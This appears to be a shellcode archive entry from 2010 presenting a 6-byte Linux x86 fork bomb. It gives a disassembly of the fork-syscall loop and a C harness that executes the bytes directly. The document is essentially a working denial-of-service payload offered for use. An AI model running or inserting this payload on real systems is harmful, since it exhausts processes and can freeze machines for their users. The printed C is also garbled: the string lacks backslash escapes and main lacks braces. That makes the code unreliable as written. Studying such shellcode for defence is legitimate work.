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# Title : Linux x86 forkbombe
# Published : 2010-04-21
# Author : Jonathan Salwan
# Previous Title : 34 bytes setreud(getuid(), getuid()) & execve("/bin/sh") Shellcode
# Next Title : Linux write() & exit(0) shellcode genearator with customizable text

Title:	Linux x86 forkbombe - 6 bytes
Author:	Jonathan Salwan <submit@shell-storm.org>
Web:	http://www.shell-storm.org

! Database of shellcodes: http://www.shell-storm.org/shellcode/

Disassembly of section .text:

08048054 <_a>:
 8048054:	b0 02                	mov    $0x2,%al
 8048056:	cd 80                	int    $0x80
 8048058:	eb fa                	jmp    8048054 <_a>


#include <stdio.h>

char shellcode[] = "xb0x02xcdx80xebxfa";

int main()
fprintf(stdout,"Lenght: %dn",strlen(shellcode));
(*(void  (*)()) shellcode)();